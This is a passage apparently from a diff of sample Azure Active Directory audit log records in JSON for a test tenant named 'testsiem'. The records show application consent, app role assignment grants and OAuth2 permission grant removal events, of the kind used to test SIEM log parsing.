"ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": 
"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", 
"Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, 
"ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": 
"1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"NewValue": "asr@testsiem.onmicrosoft.com", "OldValue": "", "Name": "User.UPN"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": 
"env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, 
{"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", 
